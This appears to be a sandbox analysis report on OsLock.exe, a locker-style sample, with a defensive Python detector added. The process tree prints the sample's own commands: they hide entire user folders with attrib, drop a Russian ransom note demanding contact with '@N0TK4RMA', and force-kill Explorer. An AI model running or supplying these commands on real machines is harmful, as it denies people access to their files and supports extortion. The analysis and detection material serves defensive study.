Analysis

  • max time kernel
    149s
  • max time network
    141s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    22-11-2024 09:15

General

  • Target

    OsLock.exe

  • Size

    385KB

  • MD5

    675ea787630f596da0474830ffb49723

  • SHA1

    c8e18cbc3cca1ded47eb5860a71b9f22d46409e1

  • SHA256

    ad861f41bb4a31ee778bf60cecf0a7bdd9c0cc91d5cc17775d15199c214fbccf

  • SHA512

    fa3c2c6edd3435bd16ec652c1738695cd1e8cdbd010b55fd856cefdbebd50552074d06e9b66860fae9c3a2f71ffe1076bb0227944b49286f05e1a3a4c871014d

  • SSDEEP

    6144:Z1IE/9oydPc4IvjTZlyZsDDyr3rAUp48zUCpM69/KImQi/6ebkY:Z1vlc4IrTZlyGDc54

Malware Config

Signatures

  • Modifies WinLogon for persistence (2 TTPs, 1 IoC)
  • Adds Run key to start application (2 TTPs, 13 IoCs)
  • Drops desktop.ini file(s) (4 IoCs)
  • Hide Artifacts: Hidden Files and Directories (1 TTP, 6 IoCs)
  • Kills process with taskkill (1 IoC)
  • Suspicious behavior: EnumeratesProcesses (1 IoC)
  • Suspicious use of AdjustPrivilegeToken (2 IoCs)
  • Suspicious use of WriteProcessMemory (38 IoCs)
  • Views/modifies file attributes (1 TTP, 12 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\OsLock.exe
    "C:\Users\Admin\AppData\Local\Temp\OsLock.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Adds Run key to start application
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:460
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c F: & attrib +h +s +r +i /D & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:3700
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Views/modifies file attributes
        PID:856
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-lox.txt
        3⤵
        • Views/modifies file attributes
        PID:2808
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c cd "%userprofile%\desktop"&attrib +h +s +r +i /D & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:1108
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:5096
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-lox.txt
        3⤵
        • Views/modifies file attributes
        PID:5092
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c cd "%systemdrive%\Users\Public\Desktop"&attrib +h +s +r +i /D & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:4320
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:1524
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-lox.txt
        3⤵
        • Views/modifies file attributes
        PID:4868
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c cd "%userprofile%\downloads"&attrib +h +s +r +i /D & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:740
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:1444
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-lox.txt
        3⤵
        • Views/modifies file attributes
        PID:4540
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c cd "%userprofile%\documents"&attrib +h +s +r +i /D & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:1432
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:2468
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-lox.txt
        3⤵
        • Views/modifies file attributes
        PID:4260
    • C:\Windows\SYSTEM32\cmd.exe
      cmd.exe /c cd "%userprofile%"&attrib +h +s +r +i /D & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:1880
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D
        3⤵
        • Views/modifies file attributes
        PID:2564
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-lox.txt
        3⤵
        • Views/modifies file attributes
        PID:444
    • C:\Windows\SYSTEM32\taskkill.exe
      taskkill.exe /im Explorer.exe /f
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1404
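
The tree above is the sample's whole visible footprint. For each target location (drive F:, the user's Desktop, the Public desktop, Downloads, Documents and the profile root) OsLock.exe spawns one cmd.exe that does three things in sequence: it runs attrib +h +s +r +i /D with no file operand, which marks every file in the working directory, and with /D every folder, as hidden, system, read-only and not-content-indexed; it echoes the note, in Russian, "[%RANDOM%] Oopsie, your files are encrypted! Write to @N0TK4RMA", into info-0v92.txt; and it runs attrib -h +s +r on info-lox.txt, a name that does not match the note just written, so that last step finds nothing and the note stays as echo created it (visible, since it was made after the hide). Finally Explorer.exe is killed with taskkill /f. Beyond the note, nothing in this tree or in the dropped-file list shows files being encrypted, and the Run-key and WinLogon changes flagged under Signatures are not expanded here.

The following is an added detection example, not code from the sandbox vendor or from the sample's author. It runs three heuristics over process-creation records constructed to mirror the Processes section (plus one benign control) and attributes each hit to the root of its process tree, so the dropper scores from what its children do. The record fields, the regexes and the severity rule are this example's own assumptions; in production the records would come from Sysmon Event ID 1 or Security 4688.

```python
"""Added example: flag the cmd.exe -> attrib / echo-redirect / taskkill chain
seen in the OsLock.exe process tree from process-creation records.

The records below are CONSTRUCTED to mirror the report's Processes section;
field names and heuristics are this example's own assumptions.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed sample: PIDs and command lines copied from the report; the
# last record is a benign control (admin hiding one file) that must not fire.
EVENTS = [
    ProcEvent(460, 1, r"C:\Users\Admin\AppData\Local\Temp\OsLock.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\OsLock.exe"'),
    ProcEvent(1108, 460, r"C:\Windows\SYSTEM32\cmd.exe",
              r'cmd.exe /c cd "%userprofile%\desktop"&attrib +h +s +r +i /D & '
              r'echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA '
              r'1>info-0v92.txt & attrib -h +s +r info-lox.txt'),
    ProcEvent(5096, 1108, r"C:\Windows\system32\attrib.exe", "attrib +h +s +r +i /D"),
    ProcEvent(5092, 1108, r"C:\Windows\system32\attrib.exe", "attrib -h +s +r info-lox.txt"),
    ProcEvent(1404, 460, r"C:\Windows\SYSTEM32\taskkill.exe", "taskkill.exe /im Explorer.exe /f"),
    ProcEvent(9001, 9000, r"C:\Windows\system32\attrib.exe", r"attrib +h C:\Users\Admin\secret.txt"),
]

ATTR_FLAG = re.compile(r"^[+-][rashoixpuv]$", re.I)   # attrib attribute switches
ATTR_OPT = re.compile(r"^/[sdl]$", re.I)               # /S /D /L
NOTE_REDIRECT = re.compile(r"echo\s+(.+?)\s*\d?>\s*(\S+\.txt)", re.I)


def _attrib_parts(cmdline):
    """Split an attrib command line into (flags, operands); None if not attrib."""
    toks = cmdline.split()
    if not toks or not toks[0].lower().startswith("attrib"):
        return None
    flags = [t.lower() for t in toks[1:] if ATTR_FLAG.match(t)]
    operands = [t for t in toks[1:] if not ATTR_FLAG.match(t) and not ATTR_OPT.match(t)]
    return flags, operands


def attrib_hides_whole_directory(cmdline):
    """attrib with attribute flags but no file operand acts on every file in
    the working directory (folders too with /D); +h together with +s makes
    them 'protected operating system files', hidden even when Explorer is
    set to show hidden files. attrib on one named file does not fire."""
    parts = _attrib_parts(cmdline)
    if parts is None:
        return False
    flags, operands = parts
    return not operands and "+h" in flags


def ransom_note_drop(cmdline):
    """For a cmd.exe chain that echoes text into a .txt, return
    (note_file, unhide_target): the file the note was redirected to and the
    operand of a later 'attrib -h' in the same chain (None if absent).
    A mismatch between the two means the un-hide never touches the note."""
    m = NOTE_REDIRECT.search(cmdline)
    if not m:
        return None
    unhide_target = None
    for segment in cmdline.split("&"):
        parts = _attrib_parts(segment.strip())
        if parts and "-h" in parts[0] and parts[1]:
            unhide_target = parts[1][-1]
    return m.group(2), unhide_target


def kills_explorer(cmdline):
    """taskkill /f against explorer.exe leaves the user with no desktop."""
    toks = cmdline.lower().split()
    return bool(toks) and toks[0].startswith("taskkill") and "/f" in toks \
        and "explorer.exe" in toks


def analyze(events):
    """Attribute every hit to the top of its process tree (the dropper) and
    return {root_pid: {"techniques": set, "notes": list, "children": set}}."""
    by_pid = {e.pid: e for e in events}

    def root_of(e):
        while e.ppid in by_pid:
            e = by_pid[e.ppid]
        return e.pid

    findings = {}
    for e in events:
        techs = set()
        if attrib_hides_whole_directory(e.cmdline):
            techs.add("T1564.001 attrib +h +s on whole directory")
        note = ransom_note_drop(e.cmdline)
        if note:
            techs.add("ransom note written via echo redirect")
        if kills_explorer(e.cmdline):
            techs.add("explorer.exe killed with taskkill /f")
        if not techs:
            continue
        f = findings.setdefault(root_of(e), {"techniques": set(), "notes": [], "children": set()})
        f["techniques"] |= techs
        f["children"].add(e.pid)
        if note:
            f["notes"].append(note)
    return findings


def severity(finding):
    """Two or more distinct techniques under one root is a confident hit."""
    return "high" if len(finding["techniques"]) >= 2 else "medium"


if __name__ == "__main__":
    for root, f in analyze(EVENTS).items():
        print(root, severity(f), sorted(f["techniques"]), f["notes"])
```

On the constructed records the only root flagged is PID 460, with all three techniques and the note tuple ("info-0v92.txt", "info-lox.txt"); the benign single-file attrib and the attrib -h call with an operand produce nothing. Correlating at the tree root is what keeps each heuristic individually loose (attrib and taskkill are everyday admin tools) while the combination stays specific.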

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\Documents\info-0v92.txt

    Filesize

    56B

    MD5

    5250167e9ed5616c92f2c49b7e295375

    SHA1

    6ca4f968809543f95a7c476bf39a9000231a4a4e

    SHA256

    0a8ce0b30dffe9ca968d05f8067a017bc48e0f5a432d75b4b7d25d59ad58a40d

    SHA512

    df65c59ba2c3b5033b85c4a526957c0ecd508acb2222b95133fa574df7a77abd3007a682d56312357e3ace87b88bd386c5463884d2c28c184808cf7c0608aeec

  • Memory dumps of PID 460 (OsLock.exe), sorted by dump index. Four distinct
    regions were captured; 0x000000001B700000-0x000000001B8A9000 was dumped
    14 times (indices 13 and 15 through 27). The 408KB region at
    0x00000000005E0000 is close to the 385KB on-disk size of OsLock.exe.

    Dump                                                              Filesize
    memory/460-0-0x00007FFF166E3000-0x00007FFF166E5000-memory.dmp     8KB
    memory/460-1-0x00000000005E0000-0x0000000000646000-memory.dmp     408KB
    memory/460-2-0x00007FFF166E0000-0x00007FFF171A1000-memory.dmp     10.8MB
    memory/460-12-0x00007FFF166E3000-0x00007FFF166E5000-memory.dmp    8KB
    memory/460-13-0x000000001B700000-0x000000001B8A9000-memory.dmp    1.7MB
    memory/460-14-0x00007FFF166E0000-0x00007FFF171A1000-memory.dmp    10.8MB
    memory/460-15-0x000000001B700000-0x000000001B8A9000-memory.dmp    1.7MB
    memory/460-16-0x000000001B700000-0x000000001B8A9000-memory.dmp    1.7MB
    memory/460-17-0x000000001B700000-0x000000001B8A9000-memory.dmp    1.7MB
    memory/460-18-0x000000001B700000-0x000000001B8A9000-memory.dmp    1.7MB
    memory/460-19-0x000000001B700000-0x000000001B8A9000-memory.dmp    1.7MB
    memory/460-20-0x000000001B700000-0x000000001B8A9000-memory.dmp    1.7MB
    memory/460-21-0x000000001B700000-0x000000001B8A9000-memory.dmp    1.7MB
    memory/460-22-0x000000001B700000-0x000000001B8A9000-memory.dmp    1.7MB
    memory/460-23-0x000000001B700000-0x000000001B8A9000-memory.dmp    1.7MB
    memory/460-24-0x000000001B700000-0x000000001B8A9000-memory.dmp    1.7MB
    memory/460-25-0x000000001B700000-0x000000001B8A9000-memory.dmp    1.7MB
    memory/460-26-0x000000001B700000-0x000000001B8A9000-memory.dmp    1.7MB
    memory/460-27-0x000000001B700000-0x000000001B8A9000-memory.dmp    1.7MB